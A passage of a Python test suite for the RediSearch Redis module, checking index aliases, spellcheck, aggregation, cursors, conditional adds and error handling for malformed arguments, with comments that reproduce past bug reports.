conn.execute_command('DEL', 'doc1')
# index list should be cleared now. This can be tested by trying to alias
# the old alias to different index
env.cmd('ft.aliasAdd', 'myIndex', 'idx2')
env.cmd('ft.aliasAdd', 'alias2', 'idx2')
env.cmd('ft.add', 'myIndex', 'doc2', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'alias2', 'hello')
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
# check that aliasing one alias to another returns an error. This will
# end up being confusing
env.expect('ft.aliasAdd', 'alias3', 'myIndex').raiseError()
# check that deleting the alias works as expected
env.expect('ft.aliasDel', 'myIndex').notRaiseError()
env.expect('ft.search', 'myIndex', 'foo').raiseError()
# create a new index and see if we can use the old name
env.cmd('ft.create', 'idx3', 'ON', 'HASH', 'PREFIX', 1, 'doc3', 'schema', 't1', 'text')
env.cmd('ft.add', 'idx3', 'doc3', 1.0, 'fields', 't1', 'foo')
env.cmd('ft.aliasAdd', 'myIndex', 'idx3')
# also, check that this works in rdb save
for _ in env.retry_with_rdb_reload():
waitForIndex(env, 'myIndex')
r = env.cmd('ft.search', 'myIndex', 'foo')
env.assertEqual([1L, 'doc3', ['t1', 'foo']], r)
# Check that we can move an alias from one index to another
env.cmd('ft.aliasUpdate', 'myIndex', 'idx2')
r = env.cmd('ft.search', 'myIndex', "hello")
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
# Test that things like ft.get, ft.aggregate, etc. work
r = env.cmd('ft.get', 'myIndex', 'doc2')
env.assertEqual(['t1', 'hello'], r)
r = env.cmd('ft.aggregate', 'myIndex', 'hello', 'LOAD', '1', '@t1')
env.assertEqual([1, ['t1', 'hello']], r)
# Test update
env.expect('ft.aliasAdd', 'updateIndex', 'idx3')
env.expect('ft.aliasUpdate', 'updateIndex', 'fake_idx')
r = env.cmd('ft.del', 'idx2', 'doc2')
env.assertEqual(1, r)
env.expect('ft.aliasdel').raiseError()
env.expect('ft.aliasdel', 'myIndex', 'yourIndex').raiseError()
env.expect('ft.aliasdel', 'non_existing_alias').raiseError()
def testNoCreate(env):
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'f1', 'text')
env.expect('ft.add', 'idx', 'schema', 'f1').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'fields', 'f1', 'hello').notRaiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'world').notRaiseError()
def testSpellCheck(env):
env.cmd('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
rv = env.cmd('FT.SPELLCHECK', 'idx', '111111')
env.assertEqual([['TERM', '111111', []]], rv)
if not env.isCluster():
rv = env.cmd('FT.SPELLCHECK', 'idx', '111111', 'FULLSCOREINFO')
env.assertEqual([1L, ['TERM', '111111', []]], rv)
# Standalone functionality
def testIssue484(env):
# Issue with split
# 127.0.0.1:6379> ft.drop productSearch1
# OK
# 127.0.0.1:6379> "FT.CREATE" "productSearch1" "NOSCOREIDX" "SCHEMA" "productid" "TEXT" "categoryid" "TEXT" "color" "TEXT" "timestamp" "NUMERIC"
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID1" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID2" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "small cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID3" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID4" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "green" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID5" "1.0" "REPLACE" "FIELDS" "productid" "3" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> FT.AGGREGATE productSearch1 * load 2 @color @categoryid APPLY "split(format(\"%s-%s\",@color,@categoryid),\"-\")" as value GROUPBY 1 @value REDUCE COUNT 0 as value_count
env.cmd('ft.create', 'productSearch1', 'noscoreidx', 'ON', 'HASH', 'schema', 'productid',
'text', 'categoryid', 'text', 'color', 'text', 'timestamp', 'numeric')
env.cmd('ft.add', 'productSearch1', 'GUID1', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID2', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'small cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID3', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID4', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'green', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID5', '1.0', 'REPLACE', 'FIELDS', 'productid', '3', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
res = env.cmd('FT.AGGREGATE', 'productSearch1', '*',
'load', '2', '@color', '@categoryid',
'APPLY', 'split(format("%s-%s",@color,@categoryid),"-")', 'as', 'value',
'GROUPBY', '1', '@value',
'REDUCE', 'COUNT', '0', 'as', 'value_count',
'SORTBY', '4', '@value_count', 'DESC', '@value', 'ASC')
expected = [6, ['value', 'white', 'value_count', '2'], ['value', 'cars', 'value_count', '2'], ['value', 'small cars', 'value_count', '1'], ['value', 'blue', 'value_count', '2'], ['value', 'Big cars', 'value_count', '2'], ['value', 'green', 'value_count', '1']]
assertAggrowsEqual(env, expected, res)
for var in expected:
env.assertIn(var, res)
def testIssue501(env):
env.cmd('FT.CREATE', 'incidents', 'ON', 'HASH', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.cmd('FT.DICTADD', 'slang', 'timmies', 'toque', 'toonie', 'serviette', 'kerfuffle', 'chesterfield')
rv = env.cmd('FT.SPELLCHECK', 'incidents', 'qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq',
'TERMS', 'INCLUDE', 'slang', 'TERMS', 'EXCLUDE', 'slang')
env.assertEqual("qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq", rv[0][1])
env.assertEqual([], rv[0][2])
env.expect('FT.SPELLCHECK', 'incidents', 'qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq',
'TERMS', 'FAKE_COMMAND', 'slang').error()
def testIssue589(env):
env.cmd('FT.CREATE', 'incidents', 'ON', 'HASH', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.expect('FT.SPELLCHECK', 'incidents', 'report :').error().contains("Syntax error at offset")
def testIssue621(env):
env.expect('ft.create', 'test', 'ON', 'HASH', 'SCHEMA', 'uuid', 'TAG', 'title', 'TEXT').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'uuid', 'foo', 'title', 'bar').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'title', 'bar').equal('OK')
res = env.cmd('ft.search', 'test', '@uuid:{foo}')
env.assertEqual(toSortedFlatList(res), toSortedFlatList([1L, 'a', ['uuid', 'foo', 'title', 'bar']]))
# Server crash on doc names that conflict with index keys #666
# again this test is not relevant cause index is out of key space
# def testIssue666(env):
# # We cannot reliably determine that any error will occur in cluster mode
# # because of the key name
# env.skipOnCluster()
# env.cmd('ft.create', 'foo', 'schema', 'bar', 'text')
# env.cmd('ft.add', 'foo', 'mydoc', 1, 'fields', 'bar', 'one two three')
# # crashes here
# with env.assertResponseError():
# env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'fields', 'bar', 'four five six')
# # try with replace:
# with env.assertResponseError():
# env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'REPLACE',
# 'FIELDS', 'bar', 'four five six')
# with env.assertResponseError():
# env.cmd('ft.add', 'foo', 'idx:foo', '1', 'REPLACE',
# 'FIELDS', 'bar', 'four five six')
# env.cmd('ft.add', 'foo', 'mydoc1', 1, 'fields', 'bar', 'four five six')
# 127.0.0.1:6379> flushdb
# OK
# 127.0.0.1:6379> ft.create foo SCHEMA bar text
# OK
# 127.0.0.1:6379> ft.add foo mydoc 1 FIELDS bar "one two three"
# OK
# 127.0.0.1:6379> keys *
# 1) "mydoc"
# 2) "ft:foo/one"
# 3) "idx:foo"
# 4) "ft:foo/two"
# 5) "ft:foo/three"
# 127.0.0.1:6379> ft.add foo "ft:foo/two" 1 FIELDS bar "four five six"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
def testPrefixDeletedExpansions(env):
env.skipOnCluster()
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 'txt1', 'text', 'tag1', 'tag')
# get the number of maximum expansions
maxexpansions = int(env.cmd('ft.config', 'get', 'MAXEXPANSIONS')[0][1])
for x in range(maxexpansions):
env.cmd('ft.add', 'idx', 'doc{}'.format(x), 1, 'fields',
'txt1', 'term{}'.format(x), 'tag1', 'tag{}'.format(x))
for x in range(maxexpansions):
env.cmd('ft.del', 'idx', 'doc{}'.format(x))
env.cmd('ft.add', 'idx', 'doc_XXX', 1, 'fields', 'txt1', 'termZZZ', 'tag1', 'tagZZZ')
# r = env.cmd('ft.search', 'idx', 'term*')
# print(r)
# r = env.cmd('ft.search', 'idx', '@tag1:{tag*}')
# print(r)
tmax = time.time() + 0.5 # 250ms max
iters = 0
while time.time() < tmax:
iters += 1
env.cmd('ft.debug', 'gc_forceinvoke', 'idx')
r = env.cmd('ft.search', 'idx', '@txt1:term* @tag1:{tag*}')
if r[0]:
break
# print 'did {} iterations'.format(iters)
r = env.cmd('ft.search', 'idx', '@txt1:term* @tag1:{tag*}')
env.assertEqual(toSortedFlatList([1, 'doc_XXX', ['txt1', 'termZZZ', 'tag1', 'tagZZZ']]), toSortedFlatList(r))
def testOptionalFilter(env):
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 't1', 'text')
for x in range(100):
env.cmd('ft.add', 'idx', 'doc_{}'.format(x), 1, 'fields', 't1', 'hello world word{}'.format(x))
env.cmd('ft.explain', 'idx', '(~@t1:word20)')
# print(r)
r = env.cmd('ft.search', 'idx', '~(word20 => {$weight: 2.0})')
def testIssue736(env):
#for new RS 2.0 ft.add does not return certian errors
env.skip()
# 1. create the schema, we need a tag field
env.cmd('ft.create', 'idx', 'ON', 'HASH',
'schema', 't1', 'text', 'n2', 'numeric', 't2', 'tag')
# 2. create a single document to initialize at least one RSAddDocumentCtx
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello', 't2', 'foo, bar')
# 3. create a second document with many filler fields to force a realloc:
extra_fields = []
for x in range(20):
extra_fields += ['nidx_fld{}'.format(x), 'val{}'.format(x)]
extra_fields += ['n2', 'not-a-number', 't2', 'random, junk']
with env.assertResponseError():
env.cmd('ft.add', 'idx', 'doc2', 1, 'fields', *extra_fields)
def testCriteriaTesterDeactivated():
env = Env(moduleArgs='_MAX_RESULTS_TO_UNSORTED_MODE 1')
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'schema', 't1', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello1 hey hello2')
env.cmd('ft.add', 'idx', 'doc2', 1, 'fields', 't1', 'hello2 hey')
env.cmd('ft.add', 'idx', 'doc3', 1, 'fields', 't1', 'hey')
env.expect('ft.search', 'idx', '(hey hello1)|(hello2 hey)').equal([2L, 'doc1', ['t1', 'hello1 hey hello2'], 'doc2', ['t1', 'hello2 hey']])
def testIssue828(env):
env.cmd('ft.create', 'beers', 'ON', 'HASH', 'SCHEMA',
'name', 'TEXT', 'PHONETIC', 'dm:en',
'style', 'TAG', 'SORTABLE',
'abv', 'NUMERIC', 'SORTABLE')
rv = env.cmd("FT.ADD", "beers", "802", "1.0",
"FIELDS", "index", "25", "abv", "0.049",
"name", "Hell or High Watermelon Wheat (2009)",
"style", "Fruit / Vegetable Beer")
env.assertEqual('OK', rv)
def testIssue862(env):
env.cmd('ft.create', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE')
rv = env.cmd("FT.ADD", "idx", "doc1", "1.0", "FIELDS", "test", "foo")
env.assertEqual('OK', rv)
env.cmd("FT.SEARCH", "idx", "foo", 'WITHSORTKEYS')
env.assertTrue(env.isUp())
def testIssue_884(env):
env.expect('FT.create', 'idx', 'ON', 'HASH', 'STOPWORDS', '0', 'SCHEMA', 'title', 'text', 'weight',
'50', 'subtitle', 'text', 'weight', '10', 'author', 'text', 'weight',
'10', 'description', 'text', 'weight', '20').equal('OK')
env.expect('FT.ADD', 'idx', 'doc4', '1.0', 'FIELDS', 'title', 'mohsin conversation the conversation tahir').equal('OK')
env.expect('FT.ADD', 'idx', 'doc3', '1.0', 'FIELDS', 'title', 'Fareham Civilization Church - Sermons and conversations mohsin conversation the').equal('OK')
env.expect('FT.ADD', 'idx', 'doc2', '1.0', 'FIELDS', 'title', 'conversation the conversation - a drama about conversation, the science of conversation.').equal('OK')
env.expect('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'title', 'mohsin conversation with the mohsin').equal('OK')
expected = [2L, 'doc2', ['title', 'conversation the conversation - a drama about conversation, the science of conversation.'], 'doc4', ['title', 'mohsin conversation the conversation tahir']]
res = env.cmd('FT.SEARCH', 'idx', '@title:(conversation) (@title:(conversation the conversation))=>{$inorder: true;$slop: 0}')
env.assertEquals(len(expected), len(res))
for v in expected:
env.assertContains(v, res)
def testIssue_866(env):
env.expect('ft.sugadd', 'sug', 'test123', '1').equal(1)
env.expect('ft.sugadd', 'sug', 'test456', '1').equal(2)
env.expect('ft.sugdel', 'sug', 'test').equal(0)
env.expect('ft.sugget', 'sug', '').equal(['test123', 'test456'])
def testIssue_848(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test1', 'TEXT', 'SORTABLE').equal('OK')
env.expect('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'test1', 'foo').equal('OK')
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'test2', 'TEXT', 'SORTABLE').equal('OK')
env.expect('FT.ADD', 'idx', 'doc2', '1.0', 'FIELDS', 'test1', 'foo', 'test2', 'bar').equal('OK')
env.expect('FT.SEARCH', 'idx', 'foo', 'SORTBY', 'test2', 'ASC').equal([2L, 'doc1', ['test1', 'foo'], 'doc2', ['test2', 'bar', 'test1', 'foo']])
def testMod_309(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
for i in range(100000):
env.expect('FT.ADD', 'idx', 'doc%d'%i, '1.0', 'FIELDS', 'test', 'foo').equal('OK')
res = env.cmd('FT.AGGREGATE', 'idx', 'foo')
env.assertEqual(len(res), 100001)
# test with cursor
res = env.cmd('FT.AGGREGATE', 'idx', 'foo', 'WITHCURSOR')
l = len(res[0]) - 1 # do not count the number of results (the first element in the results)
cursor = res[1]
while cursor != 0:
r, cursor = env.cmd('FT.CURSOR', 'READ', 'idx', str(cursor))
l += (len(r) - 1)
env.assertEqual(l, 100000)
def testIssue_865(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', '1', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', '1', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', '1', 'foo2').equal('OK')
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'ASC').equal([2, 'doc1', ['1', 'foo1'], 'doc2', ['1', 'foo2']])
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'DESC').equal([2, 'doc2', ['1', 'foo2'], 'doc1', ['1', 'foo1']])
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', 'bad', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY').error()
def testIssue_779(env):
# FT.ADD should return NOADD and not change the doc if value < same_value, but it returns OK and makes the change.
# Note that "greater than" ">" does not have the same bug.
env.cmd('FT.CREATE idx2 ON HASH SCHEMA ot1 TAG')
env.cmd('FT.ADD idx2 doc2 1.0 FIELDS newf CAT ot1 4001')
res = env.cmd('FT.GET idx2 doc2')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(["newf", "CAT", "ot1", "4001"]))
# NOADD is expected since 4001 is not < 4000, and no updates to the doc2 is expected as a result
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4000 FIELDS newf DOG ot1 4000', 'NOADD')
res = env.cmd('FT.GET idx2 doc2')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(["newf", "CAT", "ot1", "4001"]))
# OK is expected since 4001 < 4002 and the doc2 is updated
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4002 FIELDS newf DOG ot1 4002').equal('OK')
res = env.cmd('FT.GET idx2 doc2')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(["newf", "DOG", "ot1", "4002"]))
# OK is NOT expected since 4002 is not < 4002
# We expect NOADD and doc2 update; however, we get OK and doc2 updated
# After fix, @ot1 implicitly converted to a number, thus we expect NOADD
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4002 FIELDS newf FISH ot1 4002').equal('NOADD')
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if to_number(@ot1)<4002 FIELDS newf FISH ot1 4002').equal('NOADD')
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<to_str(4002) FIELDS newf FISH ot1 4002').equal('NOADD')
res = env.cmd('FT.GET idx2 doc2')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(["newf", "DOG", "ot1", "4002"]))
# OK and doc2 update is expected since 4002 < 4003
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4003 FIELDS newf HORSE ot1 4003').equal('OK')
res = env.cmd('FT.GET idx2 doc2')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(["newf", "HORSE", "ot1", "4003"]))
# Expect NOADD since 4003 is not > 4003
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1>4003 FIELDS newf COW ot1 4003').equal('NOADD')
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if 4003<@ot1 FIELDS newf COW ot1 4003').equal('NOADD')
# Expect OK and doc2 updated since 4003 > 4002
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1>4002 FIELDS newf PIG ot1 4002').equal('OK')
res = env.cmd('FT.GET idx2 doc2')
env.assertEqual(toSortedFlatList(res), toSortedFlatList(["newf", "PIG", "ot1", "4002"]))
# Syntax errors
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<4-002 FIELDS newf DOG ot1 4002').contains('Syntax error')
env.expect('FT.ADD idx2 doc2 1.0 REPLACE PARTIAL if @ot1<to_number(4-002) FIELDS newf DOG ot1 4002').contains('Syntax error')
def testUnknownSymbolErrorOnConditionalAdd(env):
env.expect('FT.CREATE idx ON HASH SCHEMA f1 TAG f2 NUMERIC NOINDEX f3 TAG NOINDEX').ok()
env.expect('ft.add idx doc1 1.0 REPLACE PARTIAL IF @f1<awfwaf FIELDS f1 foo f2 1 f3 boo').ok()
env.expect('ft.add idx doc1 1.0 REPLACE PARTIAL IF @f1<awfwaf FIELDS f1 foo f2 1 f3 boo').error()
def testWrongResultsReturnedBySkipOptimization(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'f1', 'TEXT', 'f2', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'f1', 'foo', 'f2', 'bar').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'f1', 'moo', 'f2', 'foo').equal('OK')
env.expect('ft.search', 'idx', 'foo @f2:moo').equal([0L])
def testErrorWithApply(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo bar').equal('OK')
err = env.cmd('FT.AGGREGATE', 'idx', '*', 'LOAD', '1', '@test', 'APPLY', 'split()')[1]
env.assertEqual(str(err[0]), 'Invalid number of arguments for split')
def testSummerizeWithAggregateRaiseError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.aggregate', 'idx', 'foo2', 'SUMMARIZE', 'FIELDS', '1', 'test',
'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0').error()
def testSummerizeHighlightParseError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.search', 'idx', 'foo2', 'SUMMARIZE', 'FIELDS', 'WITHSCORES').error()
env.expect('ft.search', 'idx', 'foo2', 'HIGHLIGHT', 'FIELDS', 'WITHSCORES').error()
def testCursorBadArgument(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.aggregate', 'idx', '*',
'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0',
'WITHCURSOR', 'COUNT', 'BAD').error()
def testLimitBadArgument(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.search', 'idx', '*', 'LIMIT', '1').error()
def testOnTimeoutBadArgument(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'bad').error()
def testAggregateSortByWrongArgument(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', 'bad').error()
def testAggregateSortByMaxNumberOfFields(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA',
'test1', 'TEXT', 'SORTABLE',
'test2', 'TEXT', 'SORTABLE',
'test3', 'TEXT', 'SORTABLE',
'test4', 'TEXT', 'SORTABLE',
'test5', 'TEXT', 'SORTABLE',
'test6', 'TEXT', 'SORTABLE',
'test7', 'TEXT', 'SORTABLE',
'test8', 'TEXT', 'SORTABLE',
'test9', 'TEXT', 'SORTABLE'
).equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', 'foo2').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '9', *['@test%d' % (i + 1) for i in range(9)]).error()
args = ['@test%d' % (i + 1) for i in range(8)] + ['bad']
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '9', *args).error()
args = ['@test%d' % (i + 1) for i in range(8)] + ['ASC', 'MAX', 'bad']
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '9', *args).error()
args = ['@test%d' % (i + 1) for i in range(8)] + ['ASC', 'MAX']
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '9', *args).error()
def testNumericFilterError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', 'bad', '2').error()
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', '0', 'bad').error()
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', '0').error()
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', 'bad').error()
env.expect('ft.search', 'idx', '*', 'FILTER', 'test', '0', '2', 'FILTER', 'test', '0', 'bla').error()
def testGeoFilterError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', '1').error()
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', 'bad' , '2', '3', 'km').error()
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', '1' , 'bad', '3', 'km').error()
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', '1' , '2', 'bad', 'km').error()
env.expect('ft.search', 'idx', '*', 'GEOFILTER', 'test', '1' , '2', '3', 'bad').error()
def testReducerError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', 'bad').error()
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0', 'as').error()
def testGroupbyError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE').error()
if not env.isCluster(): # todo: remove once fix on coordinator
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test1').error()
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE', 'bad', '0').error()
if not env.isCluster(): # todo: remove once fix on coordinator
env.expect('ft.aggregate', 'idx', '*', 'GROUPBY', '1', '@test', 'REDUCE', 'SUM', '1', '@test1').error()
def testGroupbyWithSort(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'NUMERIC', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', 'test', '1').equal('OK')
env.expect('ft.add', 'idx', 'doc3', '1.0', 'FIELDS', 'test', '2').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'SORTBY', '2', '@test', 'ASC',
'GROUPBY', '1', '@test', 'REDUCE', 'COUNT', '0', 'as', 'count').equal([2L, ['test', '2', 'count', '1'], ['test', '1', 'count', '2']])
def testApplyError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', 'test', 'foo').equal('OK')
env.expect('ft.aggregate', 'idx', '*', 'APPLY', 'split(@test)', 'as').error()
def testLoadError(env):
env.expect('FT.CREATE', 'idx', 'ON', 'HASH', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
